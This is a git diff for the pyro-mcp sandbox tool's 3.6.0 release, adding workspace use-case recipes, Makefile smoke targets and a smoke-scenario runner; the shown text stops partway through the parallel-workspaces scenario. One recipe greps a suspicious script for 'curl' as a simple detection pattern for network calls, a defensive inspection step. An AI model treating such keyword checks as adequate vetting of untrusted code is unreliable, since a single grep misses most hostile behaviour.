diff --git a/CHANGELOG.md b/CHANGELOG.md index e641fc9..dbca7a1 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -2,6 +2,16 @@ All notable user-visible changes to `pyro-mcp` are documented here. +## 3.6.0 + +- Added `docs/use-cases/` with five concrete workspace recipes for cold-start validation, + repro-plus-fix loops, parallel workspaces, untrusted inspection, and review/eval workflows. +- Added real guest-backed smoke packs for those stories with `make smoke-use-cases` plus one + `make smoke-...` target per scenario, all backed by the shared + `scripts/workspace_use_case_smoke.py` runner. +- Updated the main docs so the stable workspace walkthrough now points directly at the recipe set + and the smoke packs as the next step after first-run validation. + ## 3.5.0 - Added chat-friendly shell reads with `--plain` and `--wait-for-idle-ms` across the CLI, diff --git a/Makefile b/Makefile index c1ccc4b..1b8ffa1 100644 --- a/Makefile +++ b/Makefile @@ -14,8 +14,10 @@ RUNTIME_ENVIRONMENTS ?= debian:12-base debian:12 debian:12-build PYPI_DIST_DIR ?= dist TWINE_USERNAME ?= __token__ PYPI_REPOSITORY_URL ?= +USE_CASE_ENVIRONMENT ?= debian:12 +USE_CASE_SMOKE_FLAGS ?= -.PHONY: help setup lint format typecheck test check dist-check pypi-publish demo network-demo doctor ollama ollama-demo run-server install-hooks runtime-bundle runtime-binaries runtime-kernel runtime-rootfs runtime-agent runtime-validate runtime-manifest runtime-sync runtime-clean runtime-fetch-binaries runtime-build-kernel-real runtime-build-rootfs-real runtime-materialize runtime-export-environment-oci runtime-export-official-environments-oci runtime-publish-environment-oci runtime-publish-official-environments-oci runtime-boot-check runtime-network-check +.PHONY: help setup lint format typecheck test check dist-check pypi-publish demo network-demo doctor ollama ollama-demo run-server install-hooks smoke-use-cases smoke-cold-start-validation smoke-repro-fix-loop smoke-parallel-workspaces smoke-untrusted-inspection smoke-review-eval runtime-bundle runtime-binaries runtime-kernel runtime-rootfs runtime-agent runtime-validate runtime-manifest runtime-sync runtime-clean runtime-fetch-binaries runtime-build-kernel-real runtime-build-rootfs-real runtime-materialize runtime-export-environment-oci runtime-export-official-environments-oci runtime-publish-environment-oci runtime-publish-official-environments-oci runtime-boot-check runtime-network-check help: @printf '%s\n' \ @@ -32,6 +34,12 @@ help: ' demo Run the deterministic VM demo' \ ' network-demo Run the deterministic VM demo with guest networking enabled' \ ' doctor Show runtime and host diagnostics' \ + ' smoke-use-cases Run all real guest-backed workspace use-case smokes' \ + ' smoke-cold-start-validation Run the cold-start repo validation smoke' \ + ' smoke-repro-fix-loop Run the repro-plus-fix loop smoke' \ + ' smoke-parallel-workspaces Run the parallel isolated workspaces smoke' \ + ' smoke-untrusted-inspection Run the unsafe or untrusted inspection smoke' \ + ' smoke-review-eval Run the review and evaluation workflow smoke' \ ' ollama-demo Run the network-enabled Ollama lifecycle demo' \ ' run-server Run the MCP server' \ ' install-hooks Install pre-commit hooks' \ @@ -104,6 +112,24 @@ network-demo: doctor: uv run pyro doctor +smoke-use-cases: + uv run python scripts/workspace_use_case_smoke.py --scenario all --environment "$(USE_CASE_ENVIRONMENT)" $(USE_CASE_SMOKE_FLAGS) + +smoke-cold-start-validation: + uv run python scripts/workspace_use_case_smoke.py --scenario cold-start-validation --environment "$(USE_CASE_ENVIRONMENT)" $(USE_CASE_SMOKE_FLAGS) + +smoke-repro-fix-loop: + uv run python scripts/workspace_use_case_smoke.py --scenario repro-fix-loop --environment "$(USE_CASE_ENVIRONMENT)" $(USE_CASE_SMOKE_FLAGS) + +smoke-parallel-workspaces: + uv run python scripts/workspace_use_case_smoke.py --scenario parallel-workspaces --environment "$(USE_CASE_ENVIRONMENT)" $(USE_CASE_SMOKE_FLAGS) + +smoke-untrusted-inspection: + uv run python scripts/workspace_use_case_smoke.py --scenario untrusted-inspection --environment "$(USE_CASE_ENVIRONMENT)" $(USE_CASE_SMOKE_FLAGS) + +smoke-review-eval: + uv run python scripts/workspace_use_case_smoke.py --scenario review-eval --environment "$(USE_CASE_ENVIRONMENT)" $(USE_CASE_SMOKE_FLAGS) + ollama: ollama-demo ollama-demo: diff --git a/README.md b/README.md index 7b56dad..40e310f 100644 --- a/README.md +++ b/README.md @@ -18,11 +18,12 @@ It exposes the same runtime in three public forms: - Vision: [docs/vision.md](docs/vision.md) - Workspace GA roadmap: [docs/roadmap/task-workspace-ga.md](docs/roadmap/task-workspace-ga.md) - LLM chat roadmap: [docs/roadmap/llm-chat-ergonomics.md](docs/roadmap/llm-chat-ergonomics.md) +- Use-case recipes: [docs/use-cases/README.md](docs/use-cases/README.md) - First run transcript: [docs/first-run.md](docs/first-run.md) - Stable workspace walkthrough GIF: [docs/assets/workspace-first-run.gif](docs/assets/workspace-first-run.gif) - Terminal walkthrough GIF: [docs/assets/first-run.gif](docs/assets/first-run.gif) - PyPI package: [pypi.org/project/pyro-mcp](https://pypi.org/project/pyro-mcp/) -- What's new in 3.5.0: [CHANGELOG.md#350](CHANGELOG.md#350) +- What's new in 3.6.0: [CHANGELOG.md#360](CHANGELOG.md#360) - Host requirements: [docs/host-requirements.md](docs/host-requirements.md) - Integration targets: [docs/integrations.md](docs/integrations.md) - Public contract: [docs/public-contract.md](docs/public-contract.md) @@ -59,7 +60,7 @@ What success looks like: ```bash Platform: linux-x86_64 Runtime: PASS -Catalog version: 3.5.0 +Catalog version: 3.6.0 ... [pull] phase=install environment=debian:12 [pull] phase=ready environment=debian:12 @@ -81,6 +82,11 @@ access to `registry-1.docker.io`, and needs local cache space for the guest imag agent needs one sandbox to stay alive across repeated commands, shells, services, checkpoints, diffs, exports, and reset. +After that stable walkthrough works, continue with the recipe set in +[docs/use-cases/README.md](docs/use-cases/README.md). It packages the five core workspace stories +into documented flows plus real guest-backed smoke targets such as `make smoke-use-cases` and +`make smoke-repro-fix-loop`. + The commands below use plain `pyro ...`. Run the same flow with `uvx --from pyro-mcp pyro ...` for the published package, or `uv run pyro ...` from a source checkout. @@ -189,7 +195,7 @@ uvx --from pyro-mcp pyro env list Expected output: ```bash -Catalog version: 3.5.0 +Catalog version: 3.6.0 debian:12 [installed|not installed] Debian 12 environment with Git preinstalled for common agent workflows. debian:12-base [installed|not installed] Minimal Debian 12 environment for shell and core Unix tooling. debian:12-build [installed|not installed] Debian 12 environment with Git and common build tools preinstalled. @@ -305,7 +311,7 @@ Persistent workspaces start in `/workspace` and keep command history until you d machine consumption, add `--json` and read the returned `workspace_id`. Use `--seed-path` when you want the workspace to start from a host directory or a local `.tar` / `.tar.gz` / `.tgz` archive instead of an empty workspace. Use `pyro workspace sync push` when you want to import -later host-side changes into a started workspace. Sync is non-atomic in `3.5.0`; if it fails +later host-side changes into a started workspace. Sync is non-atomic in `3.6.0`; if it fails partway through, prefer `pyro workspace reset` to recover from `baseline` or one named snapshot. Use `pyro workspace diff` to compare the live `/workspace` tree to its immutable create-time baseline, and `pyro workspace export` to copy one changed file or directory back to the host. Use diff --git a/docs/first-run.md b/docs/first-run.md index d943ed4..839740e 100644 --- a/docs/first-run.md +++ b/docs/first-run.md @@ -22,7 +22,7 @@ Networking: tun=yes ip_forward=yes ```bash $ uvx --from pyro-mcp pyro env list -Catalog version: 3.5.0 +Catalog version: 3.6.0 debian:12 [installed|not installed] Debian 12 environment with Git preinstalled for common agent workflows. debian:12-base [installed|not installed] Minimal Debian 12 environment for shell and core Unix tooling. debian:12-build [installed|not installed] Debian 12 environment with Git and common build tools preinstalled. @@ -121,6 +121,10 @@ $ uvx --from pyro-mcp pyro mcp serve --profile workspace-core `pyro demo` proves the one-shot create/start/exec/delete VM lifecycle works end to end. +Once that stable workspace flow works, continue with the five recipe docs in +[use-cases/README.md](use-cases/README.md) or run the real guest-backed smoke packs directly with +`make smoke-use-cases`. + When you need repeated commands in one sandbox, switch to `pyro workspace ...`: ```bash @@ -252,7 +256,7 @@ State: started Use `--seed-path` when the workspace should start from a host directory or a local `.tar` / `.tar.gz` / `.tgz` archive instead of an empty `/workspace`. Use `pyro workspace sync push` when you need to import later host-side changes into a started -workspace. Sync is non-atomic in `3.5.0`; if it fails partway through, prefer `pyro workspace reset` +workspace. Sync is non-atomic in `3.6.0`; if it fails partway through, prefer `pyro workspace reset` to recover from `baseline` or one named snapshot. Use `pyro workspace diff` to compare the current `/workspace` tree to its immutable create-time baseline, `pyro workspace snapshot *` to create named checkpoints, and `pyro workspace export` to copy one changed file or directory back to the diff --git a/docs/install.md b/docs/install.md index 2e168b0..0327eac 100644 --- a/docs/install.md +++ b/docs/install.md @@ -85,7 +85,7 @@ uvx --from pyro-mcp pyro env list Expected output: ```bash -Catalog version: 3.5.0 +Catalog version: 3.6.0 debian:12 [installed|not installed] Debian 12 environment with Git preinstalled for common agent workflows. debian:12-base [installed|not installed] Minimal Debian 12 environment for shell and core Unix tooling. debian:12-build [installed|not installed] Debian 12 environment with Git and common build tools preinstalled. @@ -167,6 +167,11 @@ This is the stable persistent-workspace contract: - `workspace export` copies results back to the host - `workspace stop|start` and `workspace disk *` add secondary stopped-workspace inspection and raw ext4 export +When that stable workspace path is working, continue with the recipe index at +[use-cases/README.md](use-cases/README.md). It groups the five core workspace stories and the +real smoke targets behind them, starting with `make smoke-use-cases` or one of the per-scenario +targets such as `make smoke-repro-fix-loop`. + ## 6. Optional demo proof point ```bash @@ -274,7 +279,7 @@ Workspace commands default to the persistent `/workspace` directory inside the g the identifier programmatically, use `--json` and read the `workspace_id` field. Use `--seed-path` when the workspace should start from a host directory or a local `.tar` / `.tar.gz` / `.tgz` archive. Use `pyro workspace sync push` for later host-side changes to a started workspace. Sync -is non-atomic in `3.5.0`; if it fails partway through, prefer `pyro workspace reset` to recover +is non-atomic in `3.6.0`; if it fails partway through, prefer `pyro workspace reset` to recover from `baseline` or one named snapshot. Use `pyro workspace diff` to compare the current workspace tree to its immutable create-time baseline, `pyro workspace snapshot *` to capture named checkpoints, and `pyro workspace export` to copy one changed file or directory back to the host. Use diff --git a/docs/integrations.md b/docs/integrations.md index b25ab3c..22da086 100644 --- a/docs/integrations.md +++ b/docs/integrations.md @@ -43,6 +43,7 @@ Canonical example: - [examples/openai_responses_vm_run.py](../examples/openai_responses_vm_run.py) - [examples/openai_responses_workspace_core.py](../examples/openai_responses_workspace_core.py) +- [docs/use-cases/repro-fix-loop.md](use-cases/repro-fix-loop.md) ## MCP Clients @@ -67,6 +68,7 @@ Starter config: - [examples/mcp_client_config.md](../examples/mcp_client_config.md) - [examples/claude_desktop_mcp_config.json](../examples/claude_desktop_mcp_config.json) - [examples/cursor_mcp_config.json](../examples/cursor_mcp_config.json) +- [docs/use-cases/README.md](use-cases/README.md) ## Direct Python SDK @@ -123,6 +125,7 @@ Examples: - [examples/python_lifecycle.py](../examples/python_lifecycle.py) - [examples/python_workspace.py](../examples/python_workspace.py) - [examples/python_shell.py](../examples/python_shell.py) +- [docs/use-cases/README.md](use-cases/README.md) ## Agent Framework Wrappers diff --git a/docs/roadmap/llm-chat-ergonomics.md b/docs/roadmap/llm-chat-ergonomics.md index 3277df2..6725c3c 100644 --- a/docs/roadmap/llm-chat-ergonomics.md +++ b/docs/roadmap/llm-chat-ergonomics.md @@ -6,7 +6,7 @@ goal: make the core agent-workspace use cases feel trivial from a chat-driven LLM interface. -Current baseline is `3.5.0`: +Current baseline is `3.6.0`: - the stable workspace contract exists across CLI, SDK, and MCP - one-shot `pyro run` still exists as the narrow entrypoint @@ -49,7 +49,7 @@ More concretely, the model should not need to: 2. [`3.3.0` Workspace Naming And Discovery](llm-chat-ergonomics/3.3.0-workspace-naming-and-discovery.md) - Done 3. [`3.4.0` Tool Profiles And Canonical Chat Flows](llm-chat-ergonomics/3.4.0-tool-profiles-and-canonical-chat-flows.md) - Done 4. [`3.5.0` Chat-Friendly Shell Output](llm-chat-ergonomics/3.5.0-chat-friendly-shell-output.md) - Done -5. [`3.6.0` Use-Case Recipes And Smoke Packs](llm-chat-ergonomics/3.6.0-use-case-recipes-and-smoke-packs.md) +5. [`3.6.0` Use-Case Recipes And Smoke Packs](llm-chat-ergonomics/3.6.0-use-case-recipes-and-smoke-packs.md) - Done Completed so far: @@ -63,6 +63,9 @@ Completed so far: narrow and widen only when needed. - `3.5.0` added chat-friendly shell reads with plain-text rendering and idle batching so PTY sessions are readable enough to feed directly back into a chat model. +- `3.6.0` added recipe docs and real guest-backed smoke packs for the five core workspace use + cases so the stable product is now demonstrated as repeatable end-to-end stories instead of + only isolated feature surfaces. ## Expected Outcome diff --git a/docs/roadmap/llm-chat-ergonomics/3.6.0-use-case-recipes-and-smoke-packs.md b/docs/roadmap/llm-chat-ergonomics/3.6.0-use-case-recipes-and-smoke-packs.md index a174528..ce213a1 100644 --- a/docs/roadmap/llm-chat-ergonomics/3.6.0-use-case-recipes-and-smoke-packs.md +++ b/docs/roadmap/llm-chat-ergonomics/3.6.0-use-case-recipes-and-smoke-packs.md @@ -1,6 +1,6 @@ # `3.6.0` Use-Case Recipes And Smoke Packs -Status: Planned +Status: Done ## Goal diff --git a/docs/use-cases/README.md b/docs/use-cases/README.md new file mode 100644 index 0000000..0ce0035 --- /dev/null +++ b/docs/use-cases/README.md @@ -0,0 +1,31 @@ +# Workspace Use-Case Recipes + +These recipes turn the stable workspace surface into five concrete agent flows. +They are the canonical next step after the quickstart in [install.md](../install.md) +or [first-run.md](../first-run.md). + +Run all real guest-backed scenarios locally with: + +```bash +make smoke-use-cases +``` + +Recipe matrix: + +| Use case | Recommended profile | Smoke target | Recipe | +| --- | --- | --- | --- | +| Cold-start repo validation | `workspace-full` | `make smoke-cold-start-validation` | [cold-start-repo-validation.md](cold-start-repo-validation.md) | +| Repro plus fix loop | `workspace-core` | `make smoke-repro-fix-loop` | [repro-fix-loop.md](repro-fix-loop.md) | +| Parallel isolated workspaces | `workspace-core` | `make smoke-parallel-workspaces` | [parallel-workspaces.md](parallel-workspaces.md) | +| Unsafe or untrusted code inspection | `workspace-core` | `make smoke-untrusted-inspection` | [untrusted-inspection.md](untrusted-inspection.md) | +| Review and evaluation workflows | `workspace-full` | `make smoke-review-eval` | [review-eval-workflows.md](review-eval-workflows.md) | + +All five recipes use the same real Firecracker-backed smoke runner: + +```bash +uv run python scripts/workspace_use_case_smoke.py --scenario all --environment debian:12 +``` + +That runner generates its own host fixtures, creates real guest-backed workspaces, +verifies the intended flow, exports one concrete result when relevant, and cleans +up on both success and failure. diff --git a/docs/use-cases/cold-start-repo-validation.md b/docs/use-cases/cold-start-repo-validation.md new file mode 100644 index 0000000..f856906 --- /dev/null +++ b/docs/use-cases/cold-start-repo-validation.md @@ -0,0 +1,38 @@ +# Cold-Start Repo Validation + +Recommended profile: `workspace-full` + +Smoke target: + +```bash +make smoke-cold-start-validation +``` + +Use this flow when an agent needs to treat a fresh repo like a new user would: +seed it into a workspace, run the validation script, keep one long-running +process alive, probe it from another command, and export a validation report. + +Canonical SDK flow: + +```python +from pyro_mcp import Pyro + +pyro = Pyro() +created = pyro.create_workspace(environment="debian:12", seed_path="./repo") +workspace_id = str(created["workspace_id"]) + +pyro.exec_workspace(workspace_id, command="sh validate.sh") +pyro.start_service( + workspace_id, + "app", + command="sh serve.sh", + readiness={"type": "file", "path": ".app-ready"}, +) +pyro.exec_workspace(workspace_id, command="sh -lc 'test -f .app-ready && cat service-state.txt'") +pyro.export_workspace(workspace_id, "validation-report.txt", output_path="./validation-report.txt") +pyro.delete_workspace(workspace_id) +``` + +This recipe is intentionally guest-local and deterministic. It proves startup, +service readiness, validation, and host-out report capture without depending on +external networks or private registries. diff --git a/docs/use-cases/parallel-workspaces.md b/docs/use-cases/parallel-workspaces.md new file mode 100644 index 0000000..ddc29b7 --- /dev/null +++ b/docs/use-cases/parallel-workspaces.md @@ -0,0 +1,43 @@ +# Parallel Isolated Workspaces + +Recommended profile: `workspace-core` + +Smoke target: + +```bash +make smoke-parallel-workspaces +``` + +Use this flow when the agent needs one isolated workspace per issue, branch, or +review thread and must rediscover the right one later. + +Canonical SDK flow: + +```python +from pyro_mcp import Pyro + +pyro = Pyro() +alpha = pyro.create_workspace( + environment="debian:12", + seed_path="./repo", + name="parallel-alpha", + labels={"branch": "alpha", "issue": "123"}, +) +beta = pyro.create_workspace( + environment="debian:12", + seed_path="./repo", + name="parallel-beta", + labels={"branch": "beta", "issue": "456"}, +) + +pyro.write_workspace_file(alpha["workspace_id"], "branch.txt", text="alpha\n") +pyro.write_workspace_file(beta["workspace_id"], "branch.txt", text="beta\n") +pyro.update_workspace(alpha["workspace_id"], labels={"branch": "alpha", "owner": "alice"}) +pyro.list_workspaces() +pyro.delete_workspace(alpha["workspace_id"]) +pyro.delete_workspace(beta["workspace_id"]) +``` + +The important proof here is operational, not syntactic: names, labels, list +ordering, and file contents stay isolated even when multiple workspaces are +active at the same time. diff --git a/docs/use-cases/repro-fix-loop.md b/docs/use-cases/repro-fix-loop.md new file mode 100644 index 0000000..f302974 --- /dev/null +++ b/docs/use-cases/repro-fix-loop.md @@ -0,0 +1,42 @@ +# Repro Plus Fix Loop + +Recommended profile: `workspace-core` + +Smoke target: + +```bash +make smoke-repro-fix-loop +``` + +Use this flow when the agent has to reproduce a bug, patch files without shell +quoting tricks, rerun the failing command, diff the result, export the fix, and +reset back to baseline. + +Canonical SDK flow: + +```python +from pyro_mcp import Pyro + +pyro = Pyro() +created = pyro.create_workspace(environment="debian:12", seed_path="./broken-repro") +workspace_id = str(created["workspace_id"]) + +pyro.exec_workspace(workspace_id, command="sh check.sh") +pyro.read_workspace_file(workspace_id, "message.txt") +pyro.apply_workspace_patch( + workspace_id, + patch="--- a/message.txt\n+++ b/message.txt\n@@ -1 +1 @@\n-broken\n+fixed\n", +) +pyro.exec_workspace(workspace_id, command="sh check.sh") +pyro.diff_workspace(workspace_id) +pyro.export_workspace(workspace_id, "message.txt", output_path="./message.txt") +pyro.reset_workspace(workspace_id) +pyro.delete_workspace(workspace_id) +``` + +Canonical MCP/chat example: + +- [examples/openai_responses_workspace_core.py](../../examples/openai_responses_workspace_core.py) + +This is the main `workspace-core` story: model-native file ops, repeatable exec, +structured diff, explicit export, and reset-over-repair. diff --git a/docs/use-cases/review-eval-workflows.md b/docs/use-cases/review-eval-workflows.md new file mode 100644 index 0000000..eabe981 --- /dev/null +++ b/docs/use-cases/review-eval-workflows.md @@ -0,0 +1,41 @@ +# Review And Evaluation Workflows + +Recommended profile: `workspace-full` + +Smoke target: + +```bash +make smoke-review-eval +``` + +Use this flow when an agent needs to read a checklist interactively, run an +evaluation script, checkpoint or reset its changes, and export the final report. + +Canonical SDK flow: + +```python +from pyro_mcp import Pyro + +pyro = Pyro() +created = pyro.create_workspace(environment="debian:12", seed_path="./review-fixture") +workspace_id = str(created["workspace_id"]) + +pyro.create_snapshot(workspace_id, "pre-review") +shell = pyro.open_shell(workspace_id) +pyro.write_shell(workspace_id, shell["shell_id"], input="cat CHECKLIST.md") +pyro.read_shell( + workspace_id, + shell["shell_id"], + plain=True, + wait_for_idle_ms=300, +) +pyro.close_shell(workspace_id, shell["shell_id"]) +pyro.exec_workspace(workspace_id, command="sh review.sh") +pyro.export_workspace(workspace_id, "review-report.txt", output_path="./review-report.txt") +pyro.reset_workspace(workspace_id, snapshot="pre-review") +pyro.delete_workspace(workspace_id) +``` + +This is the stable shell-facing story: readable PTY output for chat loops, +checkpointed evaluation, explicit export, and reset when a review branch goes +sideways. diff --git a/docs/use-cases/untrusted-inspection.md b/docs/use-cases/untrusted-inspection.md new file mode 100644 index 0000000..a089faa --- /dev/null +++ b/docs/use-cases/untrusted-inspection.md @@ -0,0 +1,34 @@ +# Unsafe Or Untrusted Code Inspection + +Recommended profile: `workspace-core` + +Smoke target: + +```bash +make smoke-untrusted-inspection +``` + +Use this flow when the agent needs to inspect suspicious code or an unfamiliar +repo without granting more capabilities than necessary. + +Canonical SDK flow: + +```python +from pyro_mcp import Pyro + +pyro = Pyro() +created = pyro.create_workspace(environment="debian:12", seed_path="./suspicious-repo") +workspace_id = str(created["workspace_id"]) + +pyro.list_workspace_files(workspace_id, path="/workspace", recursive=True) +pyro.read_workspace_file(workspace_id, "suspicious.sh") +pyro.exec_workspace( + workspace_id, + command="sh -lc \"grep -n 'curl' suspicious.sh > inspection-report.txt\"", +) +pyro.export_workspace(workspace_id, "inspection-report.txt", output_path="./inspection-report.txt") +pyro.delete_workspace(workspace_id) +``` + +This recipe stays offline-by-default, uses only explicit file reads and execs, +and exports only the inspection report the agent chose to materialize. diff --git a/pyproject.toml b/pyproject.toml index 104eb17..235df24 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -1,6 +1,6 @@ [project] name = "pyro-mcp" -version = "3.5.0" +version = "3.6.0" description = "Stable Firecracker workspaces, one-shot sandboxes, and MCP tools for coding agents." readme = "README.md" license = { file = "LICENSE" } diff --git a/scripts/workspace_use_case_smoke.py b/scripts/workspace_use_case_smoke.py new file mode 100644 index 0000000..c35de79 --- /dev/null +++ b/scripts/workspace_use_case_smoke.py @@ -0,0 +1,8 @@ +#!/usr/bin/env python3 + +"""Run the real guest-backed workspace use-case smoke scenarios.""" + +from pyro_mcp.workspace_use_case_smokes import main + +if __name__ == "__main__": + main() diff --git a/src/pyro_mcp/vm_environments.py b/src/pyro_mcp/vm_environments.py index b93c969..1616b6b 100644 --- a/src/pyro_mcp/vm_environments.py +++ b/src/pyro_mcp/vm_environments.py @@ -19,7 +19,7 @@ from typing import Any from pyro_mcp.runtime import DEFAULT_PLATFORM, RuntimePaths DEFAULT_ENVIRONMENT_VERSION = "1.0.0" -DEFAULT_CATALOG_VERSION = "3.5.0" +DEFAULT_CATALOG_VERSION = "3.6.0" OCI_MANIFEST_ACCEPT = ", ".join( ( "application/vnd.oci.image.index.v1+json", diff --git a/src/pyro_mcp/vm_manager.py b/src/pyro_mcp/vm_manager.py index 9bb41b0..eb90462 100644 --- a/src/pyro_mcp/vm_manager.py +++ b/src/pyro_mcp/vm_manager.py @@ -4108,7 +4108,6 @@ class VmManager: workspace.firecracker_pid = instance.firecracker_pid workspace.last_error = instance.last_error workspace.metadata = dict(instance.metadata) - self._touch_workspace_activity_locked(workspace) self._save_workspace_locked(workspace) return { "workspace_id": workspace_id, diff --git a/src/pyro_mcp/workspace_use_case_smokes.py b/src/pyro_mcp/workspace_use_case_smokes.py new file mode 100644 index 0000000..8513dce --- /dev/null +++ b/src/pyro_mcp/workspace_use_case_smokes.py @@ -0,0 +1,487 @@ +"""Canonical workspace use-case recipes and smoke scenarios.""" + +from __future__ import annotations + +import argparse +import tempfile +import time +from dataclasses import dataclass +from pathlib import Path +from typing import Callable, Final, Literal + +from pyro_mcp.api import Pyro + +DEFAULT_USE_CASE_ENVIRONMENT: Final[str] = "debian:12" +USE_CASE_SUITE_LABEL: Final[str] = "workspace-use-case-smoke" +USE_CASE_SCENARIOS: Final[tuple[str, ...]] = ( + "cold-start-validation", + "repro-fix-loop", + "parallel-workspaces", + "untrusted-inspection", + "review-eval", +) +USE_CASE_ALL_SCENARIO: Final[str] = "all" +USE_CASE_CHOICES: Final[tuple[str, ...]] = USE_CASE_SCENARIOS + (USE_CASE_ALL_SCENARIO,) + + +@dataclass(frozen=True) +class WorkspaceUseCaseRecipe: + scenario: str + title: str + profile: Literal["workspace-core", "workspace-full"] + smoke_target: str + doc_path: str + summary: str + + +WORKSPACE_USE_CASE_RECIPES: Final[tuple[WorkspaceUseCaseRecipe, ...]] = ( + WorkspaceUseCaseRecipe( + scenario="cold-start-validation", + title="Cold-Start Repo Validation", + profile="workspace-full", + smoke_target="smoke-cold-start-validation", + doc_path="docs/use-cases/cold-start-repo-validation.md", + summary=( + "Seed a small repo, validate it, run one long-lived service, probe it, " + "and export a report." + ), + ), + WorkspaceUseCaseRecipe( + scenario="repro-fix-loop", + title="Repro Plus Fix Loop", + profile="workspace-core", + smoke_target="smoke-repro-fix-loop", + doc_path="docs/use-cases/repro-fix-loop.md", + summary=( + "Reproduce a failure, patch it with model-native file ops, rerun, diff, " + "export, and reset." + ), + ), + WorkspaceUseCaseRecipe( + scenario="parallel-workspaces", + title="Parallel Isolated Workspaces", + profile="workspace-core", + smoke_target="smoke-parallel-workspaces", + doc_path="docs/use-cases/parallel-workspaces.md", + summary=( + "Create and manage multiple named workspaces, mutate them independently, " + "and verify isolation." + ), + ), + WorkspaceUseCaseRecipe( + scenario="untrusted-inspection", + title="Unsafe Or Untrusted Code Inspection", + profile="workspace-core", + smoke_target="smoke-untrusted-inspection", + doc_path="docs/use-cases/untrusted-inspection.md", + summary=( + "Inspect suspicious files offline-by-default, generate a report, and " + "export only explicit results." + ), + ), + WorkspaceUseCaseRecipe( + scenario="review-eval", + title="Review And Evaluation Workflows", + profile="workspace-full", + smoke_target="smoke-review-eval", + doc_path="docs/use-cases/review-eval-workflows.md", + summary=( + "Walk a checklist through a PTY shell, run an evaluation, export the " + "report, and reset to a checkpoint." + ), + ), +) + +_RECIPE_BY_SCENARIO: Final[dict[str, WorkspaceUseCaseRecipe]] = { + recipe.scenario: recipe for recipe in WORKSPACE_USE_CASE_RECIPES +} +ScenarioRunner = Callable[..., None] + + +def _write_text(path: Path, text: str) -> None: + path.parent.mkdir(parents=True, exist_ok=True) + path.write_text(text, encoding="utf-8") + + +def _log(message: str) -> None: + print(f"[smoke] {message}", flush=True) + + +def _create_workspace( + pyro: Pyro, + *, + environment: str, + seed_path: Path, + name: str, + labels: dict[str, str], + network_policy: str = "off", +) -> str: + created = pyro.create_workspace( + environment=environment, + seed_path=seed_path, + name=name, + labels=labels, + network_policy=network_policy, + ) + return str(created["workspace_id"]) + + +def _safe_delete_workspace(pyro: Pyro, workspace_id: str | None) -> None: + if workspace_id is None: + return + try: + pyro.delete_workspace(workspace_id) + except Exception: + return + + +def _scenario_cold_start_validation(pyro: Pyro, *, root: Path, environment: str) -> None: + seed_dir = root / "seed" + export_dir = root / "export" + _write_text( + seed_dir / "README.md", + "# cold-start validation\n\nRun `sh validate.sh` and keep `sh serve.sh` alive.\n", + ) + _write_text( + seed_dir / "validate.sh", + "#!/bin/sh\n" + "set -eu\n" + "printf '%s\\n' 'validation=pass' > validation-report.txt\n" + "printf '%s\\n' 'validated'\n", + ) + _write_text( + seed_dir / "serve.sh", + "#!/bin/sh\n" + "set -eu\n" + "printf '%s\\n' 'service started'\n" + "printf '%s\\n' 'service=ready' > service-state.txt\n" + "touch .app-ready\n" + "while true; do sleep 60; done\n", + ) + workspace_id: str | None = None + try: + workspace_id = _create_workspace( + pyro, + environment=environment, + seed_path=seed_dir, + name="cold-start-validation", + labels={"suite": USE_CASE_SUITE_LABEL, "use_case": "cold-start-validation"}, + ) + _log(f"cold-start-validation workspace_id={workspace_id}") + validation = pyro.exec_workspace(workspace_id, command="sh validate.sh") + assert int(validation["exit_code"]) == 0, validation + assert str(validation["stdout"]) == "validated\n", validation + assert str(validation["execution_mode"]) == "guest_vsock", validation + service = pyro.start_service( + workspace_id, + "app", + command="sh serve.sh", + readiness={"type": "file", "path": ".app-ready"}, + ) + assert str(service["state"]) == "running", service + probe = pyro.exec_workspace( + workspace_id, + command="sh -lc 'test -f .app-ready && cat service-state.txt'", + ) + assert probe["stdout"] == "service=ready\n", probe + logs = pyro.logs_service(workspace_id, "app", tail_lines=20) + assert "service started" in str(logs["stdout"]), logs + export_path = export_dir / "validation-report.txt" + pyro.export_workspace(workspace_id, "validation-report.txt", output_path=export_path) + assert export_path.read_text(encoding="utf-8") == "validation=pass\n" + stopped = pyro.stop_service(workspace_id, "app") + assert str(stopped["state"]) == "stopped", stopped + finally: + _safe_delete_workspace(pyro, workspace_id) + + +def _scenario_repro_fix_loop(pyro: Pyro, *, root: Path, environment: str) -> None: + seed_dir = root / "seed" + export_dir = root / "export" + _write_text(seed_dir / "message.txt", "broken\n") + _write_text( + seed_dir / "check.sh", + "#!/bin/sh\n" + "set -eu\n" + "value=$(cat message.txt)\n" + "[ \"$value\" = \"fixed\" ] || {\n" + " printf 'expected fixed got %s\\n' \"$value\" >&2\n" + " exit 1\n" + "}\n" + "printf '%s\\n' \"$value\"\n", + ) + workspace_id: str | None = None + try: + workspace_id = _create_workspace( + pyro, + environment=environment, + seed_path=seed_dir, + name="repro-fix-loop", + labels={"suite": USE_CASE_SUITE_LABEL, "use_case": "repro-fix-loop"}, + ) + _log(f"repro-fix-loop workspace_id={workspace_id}") + initial_read = pyro.read_workspace_file(workspace_id, "message.txt") + assert str(initial_read["content"]) == "broken\n", initial_read + failing = pyro.exec_workspace(workspace_id, command="sh check.sh") + assert int(failing["exit_code"]) != 0, failing + patch = pyro.apply_workspace_patch( + workspace_id, + patch=( + "--- a/message.txt\n" + "+++ b/message.txt\n" + "@@ -1 +1 @@\n" + "-broken\n" + "+fixed\n" + ), + ) + assert bool(patch["changed"]) is True, patch + passing = pyro.exec_workspace(workspace_id, command="sh check.sh") + assert int(passing["exit_code"]) == 0, passing + assert str(passing["stdout"]) == "fixed\n", passing + diff = pyro.diff_workspace(workspace_id) + assert bool(diff["changed"]) is True, diff + export_path = export_dir / "message.txt" + pyro.export_workspace(workspace_id, "message.txt", output_path=export_path) + assert export_path.read_text(encoding="utf-8") == "fixed\n" + reset = pyro.reset_workspace(workspace_id) + assert int(reset["reset_count"]) == 1, reset + clean = pyro.diff_workspace(workspace_id) + assert bool(clean["changed"]) is False, clean + finally: + _safe_delete_workspace(pyro, workspace_id) + + +def _scenario_parallel_workspaces(pyro: Pyro, *, root: Path, environment: str) -> None: + seed_dir = root / "seed" + _write_text(seed_dir / "note.txt", "shared\n") + workspace_ids: list[str] = [] + try: + alpha_id = _create_workspace( + pyro, + environment=environment, + seed_path=seed_dir, + name="parallel-alpha", + labels={"suite": USE_CASE_SUITE_LABEL, "use_case": "parallel", "branch": "alpha"}, + ) + workspace_ids.append(alpha_id) + beta_id = _create_workspace( + pyro, + environment=environment, + seed_path=seed_dir, + 